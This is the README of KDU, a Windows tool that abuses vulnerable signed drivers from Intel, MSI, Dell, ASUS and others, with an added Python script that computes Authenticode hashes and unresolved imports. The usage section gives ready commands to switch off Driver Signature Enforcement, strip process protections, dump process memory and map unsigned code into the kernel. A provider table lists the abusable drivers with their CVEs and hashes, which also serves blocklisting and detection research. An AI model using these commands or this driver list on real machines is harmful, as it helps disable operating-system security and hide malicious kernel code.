
KDU

Kernel Driver Utility

System Requirements

  • x64 Windows 7/8/8.1/10/11;
  • Administrative privilege is required.

Purpose and Features

The purpose of this tool is to give a simple way to explore Windows kernel components without doing a lot of additional work or setting up a local debugger. It features:

  • Protected Processes Hijacking via Process object modification;
  • Driver Signature Enforcement Overrider (similar to DSEFix);
  • Driver loader for bypassing Driver Signature Enforcement (similar to TDL/Stryker);
  • Support for various vulnerable drivers used as functionality "providers".

Usage

KDU -list
KDU -diag
KDU -prv ProviderID
KDU -ps ProcessID
KDU -pse Commandline
KDU -dmp ProcessID
KDU -dse value
KDU -map filename
  • -list - list currently available providers;
  • -diag - run system diagnostics for troubleshooting;
  • -prv - optional, select the vulnerable driver provider;
  • -ps - modify the process object of the given ProcessID, downgrading any protections;
  • -pse - launch a program as ProtectedProcessLight-AntiMalware (PPL);
  • -dmp - dump the virtual memory of the given process;
  • -dse - write a user-defined value to the system DSE state flags;
  • -map - map a driver into the kernel and execute its entry point; this command has the dependencies listed below:
    • -scv version - optional, select the shellcode version, default 1;
    • -drvn name - driver object name (only valid for shellcode version 3);
    • -drvr name - optional, driver registry key name (only valid for shellcode version 3).

Examples:

  • kdu -ps 1234
  • kdu -map c:\driverless\mysuperhack.sys
  • kdu -dmp 666
  • kdu -prv 1 -ps 1234
  • kdu -prv 1 -map c:\driverless\mysuperhack.sys
  • kdu -prv 6 -scv 3 -drvn DrvObj -map c:\install\e3600bm.sys
  • kdu -prv 6 -scv 3 -drvn edrv -drvr e3600bl -map c:\install\e3600bl.sys
  • kdu -dse 0
  • kdu -dse 6
  • kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"

Run on Windows 10 20H2*

Compiled and run on Windows 8.1*

Run on Windows 7 SP1 fully patched (precompiled version)*

Run on Windows 10 19H2 (precompiled version, SecureBoot enabled)*

All screenshots are from version 1.0X.

Limitations of -map command

Because of the unusual loading method, which does not involve the standard kernel loader but instead overwrites already loaded modules with shellcode, there are some limitations:

  • Loaded drivers MUST BE specially designed to run as "driverless";

That means you cannot use the parameters passed to your DriverEntry, as they won't be valid. It also means you cannot load arbitrary drivers, only specially designed ones, unless you alter the shellcode responsible for driver mapping.

  • No SEH support for target drivers;

x64 has no frame-based SEH. Instead, the try/except/finally regions are described by a table in the executable image, pointed to from the PE header (the exception directory). When an exception occurs, the system handler first looks up which module the faulting address belongs to. Mapped drivers are not in the Windows-controlled list of loaded drivers (PsLoadedModulesList, which is PatchGuard-protected), so nothing is found and the system simply crashes.

  • No driver unloading;

Mapped code can't unload itself; however, you can still release all resources allocated by your mapped code. DRIVER_OBJECT->DriverUnload should be set to NULL.

  • Only ntoskrnl imports are resolved, everything else is up to you;

If your project needs another module dependency, you have to rewrite this part of the loader.

  • Several Windows primitives are banned by PatchGuard from use by dynamic code.

Because of the unusual loading method, the mapped driver won't be in PsLoadedModulesList. That means any callback registered by such code will have its handler located in memory outside this list. PatchGuard is able to check whether registered callbacks point into valid loaded modules, and it will BSOD with "Kernel notification callout modification" if such dynamic code is detected.

In general, if you want to know what you should not do in the kernel, look at https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo, which contains a few examples of forbidden things.

Kernel traces note

This tool does not change (and this won't change in the future) the internal Windows structures MmUnloadedDrivers and/or PiDDBCacheTable. That's because:

  • KDU is not designed to circumvent third-party security software or various dubious crapware (e.g. anti-cheats);
  • These data can become a target for PatchGuard protection in the next major Windows 10 update.

Use it at your own risk. Some lazy AV may flag this tool as a hacktool/malware.

Supported Providers

Note: the provider with Id 0 is assumed as the default if no -prv command is specified.

| Id | Vendor | Driver | Software package | Version | MSFT blacklist* |
|----|--------|--------|------------------|---------|-----------------|
| 0 | Intel | IQVM64/Nal | Network Adapter Diagnostic Driver | 1.03.0.7 | Cert |
| 1 | MSI | RTCore64 | MSI Afterburner | 4.6.2 build 15658 and below | Page hash |
| 2 | Gigabyte | Gdrv | Gigabyte TOOLS | Undefined | Name |
| 3 | ASUSTeK | ATSZIO64 | ASUSTeK WinFlash utility | Undefined | Name |
| 4 | Patriot | MsIo64 | Patriot Viper RGB utility | 1.0 | Page hash |
| 5 | ASRock | GLCKIO2 | ASRock Polychrome RGB | 1.0.4 | Page hash |
| 6 | G.SKILL | EneIo64 | G.SKILL Trident Z Lighting Control | 1.00.08 | Cert |
| 7 | EVGA | WinRing0x64 | EVGA Precision X1 | 1.0.2.0 | Name |
| 8 | Thermaltake | EneTechIo64 | Thermaltake TOUGHRAM software | 1.0.3 | Page hash |
| 9 | Huawei | PhyMemx64 | Huawei MateBook Manager software | Undefined | Name, Page hash |
| 10 | Realtek | RtkIo64 | Realtek Dash Client Utility | Various | Name |
| 11 | MSI | EneTechIo64 | MSI Dragon Center | Various | |
| 12 | LG | LHA | LG Device Manager | 1.6.0.2 | Name |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | 2.1.7.1 and below | |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | 10.1 and below | Page hash |
| 15 | GMER | GmerDrv | Gmer "Antirootkit" | 2.2 and below | Name, Page hash, Cert |
| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | 2.3 and below | Page hash |
| 17 | Benjamin Delpy | Mimidrv | Mimikatz | 2.2 and below | Cert |
| 18 | Wen Jia Liu | KProcessHacker2 | Process Hacker | 2.38 and below | Name |
| 19 | Microsoft | ProcExp152 | Process Explorer | 1.5.2 and below | Name, Cert |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | 2.7 and below | |
| 21 | DarkByte | Dbk64 | Cheat Engine | 7.4 and below | Cert, Name |
| 22 | ASUSTeK | AsIO3 | ASUS GPU TweakII | 2.3.0.3 | |
| 23 | Marvin | Hw | Marvin Hardware Access Driver | 4.9 and below | Name |
| 24 | CODESYS | SysDrv3S | CODESYS SysDrv3S | 3.5.6 and below | Cert |
| 25 | Zemana | amsdk | WatchDog/MalwareFox/Zemana AM | 3.0.0 and below | |
| 26 | HiRes Ent. | inpoutx64 | Various | 1.2.0 and below | |
| 27 | PassMark | DirectIo64 | PassMark OSForensics | Any | |
| 28 | ASRock | AsrDrv106 | Phantom Gaming Tuning | 1.0.6 and below | |
| 29 | Arthur Liberman | ALSysIO64 | Core Temp | 2.0.11 and below | |
| 30 | AMD | AMDRyzenMasterDriver | Multiple software packages | 2.0.0.0 and below | |
| 31 | Hilscher | physmem | Physical Memory Viewer for Windows | 1.0.0.0 | Cert, Name |
| 32 | Lenovo | LDD | Lenovo Diagnostics Driver for Windows 10 and later | 1.0.4.0 and below | Cert, Name |
| 33 | Dell | pcdsrvc_x64 | Dell PC Doctor | 6.2.2.0 | |
| 34 | MSI | winio | MSI Foundation Service | Undefined | |
| 35 | HP | EtdSupport | ETDi Support Driver | 18.0 and below | Cert |
| 36 | Pavel Yosifovich | KExplore | Kernel Explorer | Undefined | |
| 37 | Pavel Yosifovich | KObjExp | Kernel Object Explorer | Undefined | |
| 38 | Pavel Yosifovich | KRegExp | Kernel Registry Explorer | Undefined | |
| 39 | Inspect Element LTD | EchoDrv | Echo AntiCheat (spyware) | Undefined | Hash |
| 40 | NVidia | nvoclock | NVidia System Utility Driver | 7.0.0.32 | |
| 41 | Binalyze | IREC | Binalyze DFIR | 3.11.0 | |
| 42 | DavidXXW | PhyDMACC | SLIC ToolKit | 1.2.0 | Page hash |
| 43 | Razer | rzpnk | Razer Synapse | 2.20.15.1104 | |
| 44 | AMD | PdFwKrnl | AMD Radeon™ Software (Adrenalin Edition and PRO Edition) | 23.9.1 and below | |
| 45 | AMD | AODDriver | AMD OverDrive Driver | 2.1.5 and below | |
| 46 | Wincor Nixdorf | wnBios64 | WinBios Driver | 1.2.0 and below | |
| 47 | EVGA | EleetX1 | EVGA ELEET X1 | 1.0.16.0 and below | |
| 48 | ASRock | AxtuDrv | AsRock Extreme Tuner | Undefined | |
| 49 | ASRock | AppShopDrv103 | ASRock APP Shop | 1.0.58 and below | |
| 50 | ASRock | AsrDrv107n | ASRock Motherboard Utility | 3.0.498 and below | |
| 51 | ASRock | AsrDrv107 | ASRock Motherboard Utility | 3.0.498 and below | |
| 52 | Intel | PmxDrv | Intel(R) Management Engine Tools Driver | 1.0.0.1003 and below | |

MSFT blacklist types:

  • Cert - by the certificate used to sign the driver, which makes it possible to ban a huge number of files at once.
  • Name - by the original filename entry stored in the VERSION_INFO file resources; this type of ban is only possible with cross-checking of the file version, otherwise it causes false positives if the driver has a "fixed/unaffected" version.
  • Hash/Page hash - by Authenticode hash/page hash, which allows MSFT to ban the exact driver file.
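As an added example, not code from the KDU project, the following Python script shows two of the points above in working form: the Authenticode PE digest that hash-based bans and the Authenticode(SHA1) column of the provider details table key on (it skips the CheckSum field, the security directory entry and the certificate table, so the digest survives re-signing while the plain file SHA1 does not), and an import-table walk that flags any module other than ntoskrnl.exe, the only import the -map loader resolves (see the limitations above). The PE32+ image it parses is constructed in memory by build_pe64 and is a fixture, not a real driver; page hashes are not computed.

```python
import hashlib
import struct

LOADER_RESOLVES = {"ntoskrnl.exe"}  # the only import module the -map loader resolves

def parse_headers(data):
    """Offsets the other helpers need; handles PE32 and PE32+ images."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt, magic = e_lfanew + 24, struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {
        "opt": opt,
        "ddir": opt + (112 if magic == 0x20B else 96),           # DataDirectory[0], PE32+ vs PE32
        "hdr_size": struct.unpack_from("<I", data, opt + 60)[0],  # SizeOfHeaders
        # (Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)
        "secs": [struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i) for i in range(nsec)],
    }

def rva_to_off(hdr, rva):
    for _, vsize, va, raw_size, raw_ptr in hdr["secs"]:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not backed by any section")

def cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")

def file_sha1(data):
    return hashlib.sha1(data).hexdigest()

def authenticode_sha1(data):
    """Authenticode PE digest: CheckSum, the security directory entry and the
    certificate table are excluded, so re-signing leaves the digest unchanged."""
    hdr = parse_headers(data)
    checksum_off, secdir_off = hdr["opt"] + 64, hdr["ddir"] + 4 * 8
    cert_size = struct.unpack_from("<II", data, secdir_off)[1]
    h = hashlib.sha1()
    h.update(data[:checksum_off])
    h.update(data[checksum_off + 4:secdir_off])
    h.update(data[secdir_off + 8:hdr["hdr_size"]])
    hashed = hdr["hdr_size"]
    for _, _, _, raw_size, raw_ptr in sorted(hdr["secs"], key=lambda s: s[4]):
        h.update(data[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    trailing = len(data) - hashed - cert_size  # overlay after the sections, minus the cert table
    if trailing > 0:
        h.update(data[hashed:hashed + trailing])
    return h.hexdigest()

def imports(data):
    """Imported module name (lower-cased) -> list of imported symbols."""
    hdr = parse_headers(data)
    imp_rva = struct.unpack_from("<I", data, hdr["ddir"] + 8)[0]  # DataDirectory[1]
    result, off = {}, rva_to_off(hdr, imp_rva) if imp_rva else None
    while off is not None:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, off)  # IMAGE_IMPORT_DESCRIPTOR
        if not name_rva:  # all-zero descriptor terminates the table
            break
        funcs, thunk = [], rva_to_off(hdr, oft or ft)
        while entry := struct.unpack_from("<Q", data, thunk)[0]:
            funcs.append(f"#{entry & 0xFFFF}" if entry >> 63 else cstr(data, rva_to_off(hdr, entry) + 2))
            thunk += 8
        result[cstr(data, rva_to_off(hdr, name_rva)).lower()] = funcs
        off += 20
    return result

def unresolvable_imports(data):
    """Modules a driver imports that KDU's -map loader would leave unresolved."""
    return sorted(m for m in imports(data) if m not in LOADER_RESOLVES)

def build_pe64(imports_by_dll, cert_body=b"", checksum=0):
    """Constructed PE32+ fixture (not a real driver): 0x200 bytes of headers, one .rdata
    section holding an import directory, and an optional trailing certificate table."""
    SEC_RVA, SEC_RAW = 0x1000, 0x200
    desc, thunks, names = bytearray(), bytearray(), bytearray()
    desc_size = 20 * (len(imports_by_dll) + 1)
    names_off = desc_size + sum(8 * (len(f) + 1) for f in imports_by_dll.values())
    for dll, funcs in imports_by_dll.items():
        thunk_rva = SEC_RVA + desc_size + len(thunks)
        for func in funcs:  # IMAGE_IMPORT_BY_NAME: 2-byte hint, name, NUL, padded to even length
            thunks += struct.pack("<Q", SEC_RVA + names_off + len(names))
            names += b"\0\0" + func.encode() + b"\0" * (2 - len(func) % 2)
        thunks += bytes(8)
        name_rva = SEC_RVA + names_off + len(names)
        names += dll.encode() + b"\0"
        desc += struct.pack("<IIIII", thunk_rva, 0, 0, name_rva, thunk_rva)
    sec = bytes(desc) + bytes(20) + bytes(thunks) + bytes(names)
    sec += bytes(-len(sec) % 0x200)
    cert_body += bytes(-len(cert_body) % 8)  # WIN_CERTIFICATE entries are 8-byte aligned
    cert = struct.pack("<IHH", 8 + len(cert_body), 0x200, 2) + cert_body if cert_body else b""
    ddir = [(0, 0)] * 16
    ddir[1] = (SEC_RVA, desc_size)                                 # import table (RVA)
    ddir[4] = (SEC_RAW + len(sec), len(cert)) if cert else (0, 0)  # security dir (file offset)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0, len(sec), 0, 0,
                      SEC_RVA, 0x140000000, 0x1000, 0x200, 10, 0, 0, 0, 10, 0, 0, SEC_RVA + 0x1000,
                      SEC_RAW, checksum, 1, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # Subsystem 1 = NATIVE
    opt += b"".join(struct.pack("<II", *d) for d in ddir)
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, len(opt), 0x22)
    sect = struct.pack("<8sIIIIIIHHI", b".rdata", len(sec), SEC_RVA, len(sec), SEC_RAW, 0, 0, 0, 0, 0x40000040)
    hdr = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + sect
    return hdr + bytes(SEC_RAW - len(hdr)) + sec + cert
```

Against a real driver, pass the file bytes to authenticode_sha1 and unresolvable_imports; the first can be compared with the Authenticode(SHA1) column of the provider details table, the second lists exactly the modules you would have to resolve yourself before -map could run the driver.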

KDU provider details, alternatives are available

Id Codebase Assigned CVEs Hashes
0 Original CVE-2015-2291 File(SHA1): D04E5DB5B6C848A29732BFD52029001F23C3DA75
Authenticode(SHA1): 2CBFE4AD0E1231FF3E19C19CA9311D952CE170B7
Page(SHA1): 55B90A6E4323FC1D7B71B23F81FC758F45740E02
Page(SHA256): FB14DC1657C0EDD18FA747005EB7125DBBD83595095D67906BB0B4D57222D4C1
1 Semi-original CVE-2019-16098 File(SHA1): F6F11AD2CD2B0CF95ED42324876BEE1D83E01775
Authenticode(SHA1): 4A68C2D7A4C471E062A32C83A36EEDB45A619683
Page(SHA1): 84152FA241C3808F8C7752964589C957E440403F
Page(SHA256): A807532037A3549AE3E046F183D782BCB78B6193163EA448098140563CF857CB
2 MAPMEM CVE-2018-19320 File(SHA1): FE10018AF723986DB50701C8532DF5ED98B17C39
Authenticode(SHA1): 0F5034FCF5B34BE22A72D2ECC29E348E93B6F00F
Page(SHA1): DC02DA48DF2F9B558453847399A8DE47C5AD56CC
Page(SHA256): 95406C37FDE1B08524FAB782200C8BECAEC98A40B020F41C5BA13032FE9522FA
3 Semi-original CVE-2023-41444 File(SHA1): 490109FA6739F114651F4199196C5121D1C6BDF2
Authenticode(SHA1): B66BF2B1B07F8F2BAB1418131AE66B0A55265F73
Page(SHA1): 04384DE86A18CE8D17DB3BB33CB9DD06868D4C32
Page(SHA256): 1871BE94AD775FD220F9A04C0F6B84C2C34CF898A4096E94359D9E5E269835DC
4 WINIO CVE-2019-18845 File(SHA1): E6305DDDD06490D7F87E3B06D09E9D4C1C643AF0
Authenticode(SHA1): 7E732ACB7CFAD9BA043A9350CDEFF25D742BECB8
Page(SHA1): CDE1A50E1DF7870F8E4AFD8631E45A847C714C0A
Page(SHA256): 05736AB8B48DF84D81CB2CC0FBDC9D3DA34C22DB67A3E71C6F4B6B3923740DD5
5 WINIO CVE-2018-18535, CVE-2018-18536, CVE-2018-18537 File(SHA1): CC51BE79AE56BC97211F6B73CC905C3492DA8F9D
Authenticode(SHA1): D99B80B3269D735CAC43AF5E43483E64CA7961C3
Page(SHA1): 51E0740AAEE5AE76B0095C92908C97B817DB8BEA
Page(SHA256): E7F011E9857C7DB5AACBD424612CD7E3D12C363FDC8F072DDFAF9E2E5C85F5F3
6 WINIO CVE-2020-12446 File(SHA1): B4D014B5EDD6E19CE0E8395A64FAEDF49688ECB5
Authenticode(SHA1): 651B953CB03928E41424AD59F21D4978D6F4952E
Page(SHA1): 3727D824713E733558A20DE9876AABF1059D3158
Page(SHA256): 88C83F618C8F4069DED87C409A8446C5A30E22A303E64AAFF1C5BE6302ADEDB4
7 WINRING0 CVE-2020-14979 File(SHA1): 012DB3A80FAF1F7F727B538CBE5D94064E7159DE
Authenticode(SHA1): 7AED8186977FCF7EE219DA493BAECDB95EC8040D
Page(SHA1): 9AB2257AE97DB4B0617640C90DD45AB7F144FBB9
Page(SHA256): D48209A183CDFEAADBD8A644730BD76BBF89C759844890739F934F242C226305
8 WINIO File(SHA1): 3CD037FBBA8AAE82C1B111C9F8755349C98BCB3C
Authenticode(SHA1): CE280412DD778CAFBE6DBB05B8CAB42E98D3AE56
Page(SHA1): 6CAFC03207391464AB7E69F47228CB82539BEBDE
Page(SHA256): 3F88ABF8908108207DA38DBC9E8690B3D63DB7F856B16E9F0D3A3B389FC72561
9 WINIO File(SHA1): 6ECFC7CCC4843812BFCCFB7E91594C018F0A0FF9
Authenticode(SHA1): 3C9F40AC72B0202CB40627FDEB7298079187193A
Page(SHA1): 6E7D8ABF7F81A2433F27B052B3952EFC4B9CC0B1
Page(SHA256): B7113B9A68E17428E2107B19BA099571AAFFC854B8FB9CBCEB79EF9E3FD1CC62
10 PHYMEM File(SHA1): B21CBA198D721737AABD882ADA6C91295A5975ED
Authenticode(SHA1): 7593D46A73EC00E00AEF3E9D0031C2B21B74ECFB
Page(SHA1): D4B640263D2A6C9906D4032F252CC81D838E2116
Page(SHA256): 77EC9BF2DBB106EF51D4DE49E70801D48001BF06146A370D0669E385B87C0826
11 WINIO File(SHA1): A87D6EAC2D70A3FBC04E59412326B28001C179DE
Authenticode(SHA1): 6B60825564B2DCCFF3A4F904B71541BFE94136C9
Page(SHA1): 8911B97A3140C2523287E1039B08DE8EF4D7F9AB
Page(SHA256): 85859FFD16396D0FE9897BAFBDCE94FF66474DCDEF7754FCDF2C9C7A8CE451DB
12 Semi-original CVE-2019-8372 File(SHA1): 3FD55927D5997D33F5449E9A355EB5C0452E0DE3
Authenticode(SHA1): 87C155D933CA3513E29D235562D96B88D3913CDE
Page(SHA1): B565361205846323911766F55E380D93C6A3AB02
Page(SHA256): 4818AA3F52BCF3554131B56A3A0F0C2D8BBB5F6D18837F68D811EAD7917A2DE3
13 WINIO CVE-2021-28685 File(SHA1): AA2EA973BB248B18973E57339307CFB8D309F687
Authenticode(SHA1): 92FEE95E32A727D135F1F46CA98C201FFFBF6950
Page(SHA1): C5F1D135831851E9D7A06F9636E2A50B1D5C3A04
Page(SHA256): B4DCE5B50224C2461B49F1850C73EF84E65A64D89E2F32DD931A2F3C62D9D6BF
14 Original CVE-2020-15481 File(SHA1): 2DB49BDF8029FDCDA0A2F722219AE744EAE918B0
Authenticode(SHA1): F1BDD3236F43338A119D74ECA730F0D464DED973
Page(SHA1): A14331F63EC907BF3E472F1E0CB8F19DE06EF4E4
Page(SHA256): 7F0A28CCF0AB76964D40E063F9D4B88193B77E4BADF66E8C8F87C97127885987
15 Original File(SHA1): 83506DE48BD0C50EA00C9E889FE980F56E6C6E1B
Authenticode(SHA1): 0BCA6C35159282FD64615ABC4D398399B061847B
Page(SHA1): 0882AB6651CD17F3D7D696E9C48EB4934159AE4C
Page(SHA256): 0F5DE6DE77D764E2370FA69D3CD8B2C0EC4DFC6F6736C7EDE97F3F75567ED47A
16 Original CVE-2021-21551 File(SHA1): C948AE14761095E4D76B55D9DE86412258BE7AFD
Authenticode(SHA1): E3C1DD569AA4758552566B0213EE4D1FE6382C4B
Page(SHA1): E09B5E80805B8FE853EA27D8773E31BFF262E3F7
Page(SHA256): 7E2AD3D6D76F4FCD4583B865FFC12DE6C44FC16CBCBB81D480CB067F2A860422
17 Original File(SHA1): A8DDB7565B61BC021CD2543A137E00627F999DCC
Authenticode(SHA1): 0E732D18A7D880F0505433A0DA0E100DA0E1C3A3
Page(SHA1): A1E322631A67DE6441A08C991352281CF7C83FD8
Page(SHA256): 787AC1DB370421BD26915EAE797F67AD4C6E53775970DC18226ED5225B0B8A3B
18 Original File(SHA1): D8498707F295082F6A95FD9D32C9782951F5A082
Authenticode(SHA1): 61B55BB7C111F93BD3EA9AC71591E1A6B89FEEE1
Page(SHA1): 15FA18C40598FFD05C7F99DB81EEEA1336FC4213
Page(SHA256): B6033C16527F2ADBC9E8E5C7678F649E55009319B8612765686ACB1A1C82FDDA
19 Original File(SHA1): 3296844D22C87DD5EBA3AA378A8242B41D59DB7A
Authenticode(SHA1): EDC10781EB6D1E3BDF9D15CFEBDDBE1A1FB804D9
Page(SHA1): AF2B5A3F4DBCE417295FB2CECD8DF91C5A679D44
Page(SHA256): 2C22F27671EE4C530C16821CEE2A9F48C19F99B873E36D94C4AAA0194D52B8CB
20 Original CVE-2021-36276 File(SHA1): 90A76945FD2FA45FAB2B7BCFDAF6563595F94891
Authenticode(SHA1): 6BC2AB0F03D7A58685A165B519E8FEE6937526A6
Page(SHA1): 66B2E2438725B576428CBEAE3E481148B4B5FD8C
Page(SHA256): C60578FAD95216EF74BCD9661A562C0DDC2C8697D64B546F59A7EF85F71D3814
21 Original File(SHA1): A54AE1793E9D77E61416E0D9FB81269A4BC8F8A2
Authenticode(SHA1): 1BE4BA36BA9CE5B10D90137C08CC21F823379841
Page(SHA1): 2EF1502DDE6A1CB120AC379F8C7155EB96E4BA02
Page(SHA256): F7443FBAC813EAF0AA94C73265C3BE7E723A5BF64BEF1D80E8FF57D7573FC53C
22 WINIO File(SHA1): CFA85A19D9A2F7F687B0DECDC4A5480B6E30CB8C
Authenticode(SHA1): 4BFC51E23494F7EAF27560F92CD6FBCED2FFA4F6
Page(SHA1): 09C0DC0C0440F9362BD29960236CD716B3E21453
Page(SHA256): 209D5B95C83B4923C825DF9F3DE5F5EFCEFA0C2F82FD77D9BB38FE41E81B3D02
23 Original File(SHA1): 4E56E0B1D12664C05615C69697A2F5C5D893058A
Authenticode(SHA1): 6E87CD3B027A07A810164D618E3F2FCE61EB6EC4
Page(SHA1): 45F1309E10159325BA1DFAE4CAE214BD07B355F1
Page(SHA256): EF15F8CE1C905139AC64C15C2E91E808054421D2B95E2F531EFC6FC5D9D2A471
24 MAPMEM CVE-2022-22516 File(SHA1): E1069365CB580E3525090F2FA28EFD4127223588
Authenticode(SHA1): 432B5809D84935D15574DE8D64B22E06682FF715
Page(SHA1): 13EA5846AFE3B9141C712FAFBA9F1B95B26087E5
Page(SHA256): 6E0C60A5AA46C6CCE7EB4EFA8D36D6D343C0D26694D8A9E194F254988603FC26
25 Original CVE-2021-31728, CVE-2022-42045 File(SHA1): 290D6376658CF0F8182DE0FAE40B503098FA09FD
Authenticode(SHA1): 084553447BDBC056BBE49BAD8ACFAF25EB83462A
Page(SHA1): 760DE62D6AF5F8CD46E2B2074CDF7B0805B58484
Page(SHA256): 8BFEE3E7582C0432CD02A8D75D00B8CBA9CD9A2525E3E61E0D0C8AAAC2FCFEEB
26 WINIO File(SHA1): 6AFC6B04CF73DD461E4A4956365F25C1F1162387
Authenticode(SHA1): 8E1F51761F21148F68AC925CC5F9E9C78F3D5EC4
Page(SHA1): 83714FAAF1643DBA7ABF28A4AC287A43FDEBDE81
Page(SHA256): 1D665C5DDA5E49B5C7F5231327D4A41D83201107CF428800EF24FDBB1CC505F7
27 Original File(SHA1): 01B95AE502AA09AABC69A0482FCC8198F7765950
Authenticode(SHA1): 4AEA4FBB9A732D57643F61F1BF3B82CEBB18AB72
Page(SHA1): 981F8CC044C6E21E2A4746B47EBEBAEEF49B9114
Page(SHA256): 50F9C8874653A6C25179C33EAEB19A6EC4C21BCB1EB14429DD0746C338766911
28 RWEverything CVE-2020-15368 File(SHA1): B0032B8D8E6F4BD19A31619CE38D8E010F29A816
Authenticode(SHA1): F621633290173DAAC18BB14CA3F52BC027CD2721
Page(SHA1): 32F6424734185AF58281EA4C66805A8238E61427
Page(SHA256): 281D8225E91591F799F93BF448F78F3F50B9AA7D6F1ADD3E2AC58D6BA0DE1473
29 Original File(SHA1): 256D285347ACD715ED8920E41E5EC928AE9201A8
Authenticode(SHA1): 530DD2863A09DC57801D62551C48EB9E48476FE8
Page(SHA1): 845EE7617D94A6A13016419B94CFC2D15D9BB71A
Page(SHA256): C13FDB8225E21B899A340506DB055B949C941A33D8C2D73C81E46BF5C4DDFF47
30 Original CVE-2020-12928 File(SHA1): CEC887F20AB468CAA1C99FCBE7FBDFAB25FADF39
Authenticode(SHA1): E37C6AA2630FA3CCB3EE7D219A7332CCE95FA11F
Page(SHA1): 70A164E25FD351CEDFEDEB3D89871A1D487D0379
Page(SHA256): E47556832FA7CF286FFD7F7A0646FA8015AF651D5C968F20353F6B7CFF18A1DC
31 Original File(SHA1): 17614FDEE3B89272E99758983B99111CBB1B312C
Authenticode(SHA1): FD0CB3EA1DEB4FDB22536A7C15669EB53315E5C8
Page(SHA1): 0D03AC1B15AE10BB40A7660F25F3A68E1330024E
Page(SHA256): CB27AD883FCF265B8E2C8D393C0B403914C1911A935A5D248B4C37B4D99CD7BE
32 Original CVE-2022-3699 File(SHA1): B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F
Authenticode(SHA1): 6D9543725ACA0C9C8F403425952692CCC1D2D7F2
Page(SHA1): B40A38E4D3BFB567F313A190A30F3AA9189EC1A0
Page(SHA256): 4273E0BE1A21142DE6BA672EFDAC0AC1FADC7AF0D0DAACA4E4D330D02C8F4CC8
33 Original CVE-2019-12280 File(SHA1): D0A228ED8AF190DEC0C1A812E212F5E68EE3B43E
Authenticode(SHA1): 85D493F5636B46F6C4F8B1028F8E8659F31DC562
Page(SHA1): A48431302A6C5053D178FCEC3390FBC1CACCB893
Page(SHA256): 08AFD2489CB6A093E3F588B1D13D20468AE3E27A2F0AEC9E43C41D20FFB2F6EE
34 WINIO File(SHA1): 9745D77E3C27437BBCCF39E074F7D57A99FE83B1
Authenticode(SHA1): 1419392FC1EC6EF497442FEE3F7553A68B78A03D
Page(SHA1): 863F4AFE82D791D655B2DCE5C893B37422364230
Page(SHA256): F3165AFC15FA99745D7151501E1E2A738AD04DA5A4E76E5CE135B8E247AE0D1D
35 Original File(SHA1): A57EEFA0C653B49BD60B6F46D7C441A78063B682
Authenticode(SHA1): 96FAA975FEB28588372A98A1E77D98AF7FC90E41
Page(SHA1): 197859EEFBCF17BE48A3C49818B35F263701755F
Page(SHA256): 5C8C0FC9B3B7C6C7E6BDD83A8D3ED44E075D9C3B42463E1CC5EE28049517488E
36 Original File(SHA1): 090A4FC285D4F47B1E6A1011353A329C1F4C8E09
Authenticode(SHA1): C77403CFFCD15438EA3DDDF0763AB0A70A9100CB
Page(SHA1): DCCA45C770E93BCF9FC7A9ADFC4653AE744C798C
Page(SHA256): DE88E584BC88C463F479CAA5A6F4C166B8180E2AEAC62A54879875D374704631
37 Original File(SHA1): 3303BA52A334DA58A4992C4F9FBA7272E294B7AF
Authenticode(SHA1): 43239D3355CED44FB56C4127BF96EF2ED1BE2780
Page(SHA1): 6ECDAAECEB20B8D037FD4508A4B1DCE1ADCD2203
Page(SHA256): 6DA94C767419BAFB993B39913CD99146EB80FC13B5A6D5DE96829E084D4CFC83
38 Original File(SHA1): F3383FE0FF00BDEA1AA9E68BCAAD8B83885E306D
Authenticode(SHA1): D889E03CE654903A5113F49F49A1C23F3317E7D0
Page(SHA1): 0773B431922B3208DB0C4A4E02F9CE7297AAE774
Page(SHA256): AE38ADF8B97188675D8F6396F2DC0801C60CBFD546CAEDE915B73E9332DF6C8C
39 Original CVE-2023-38817 File(SHA1): A93197C8C1897A95C4FB0367D7451019AE9F3054
Authenticode(SHA1): 678620A9CC9E7FFE179BC5CDA0A2DD0597E231EE
Page(SHA1): 832832028D40A3CFD08D364554FCE0B4F37317FF
Page(SHA256): 49ED19D5E1E122936035A48EA99FFD68CA4915578107888D5C2B0BB9E30E67C0
40 Original File(SHA1): BDA102AFBC60F3F3C5BCBD5390FFBBBB89170B9C
Authenticode(SHA1): 0FB1D0EF14AB73FCB4C62043859064CC5F9F88C2
Page(SHA1): B754B2C62796004560E2ADF5178099B98F111C25
Page(SHA256): 83D2A9535CDB68A8D6EAE5582DB7A70E01A520151448CEB572D96566A2AECB82
41 Original CVE-2023-41444 File(SHA1): D2FB46277C36498E87D0F47415B7980440D40E3D
Authenticode(SHA1): 719F659300BA463EFEEAB5916F0378C64FC1AD4A
Page(SHA1): F7FEA2BE8FF65DBB89BAF39EF8E0D80DAB81CB8E
Page(SHA256): 5FEB045C2452FD280BA1CAD5FC9B4F0DE7FC95EABDCE19FA2CD1F632891F3B1A
42 WINRING0 File(SHA1): 177B541412A45646177B2352FA2D9E89E0EEFE5A
Authenticode(SHA1): 200ABD07303234FC114360D9DABC38DA1F1F2A22
Page(SHA1): 84B91B1AED8F83DE14323089148BE2577FDC826C
Page(SHA256): B8502DB6B8947E5D852102166D0BEF8252EA3431D582E968EF44C35E56609C91
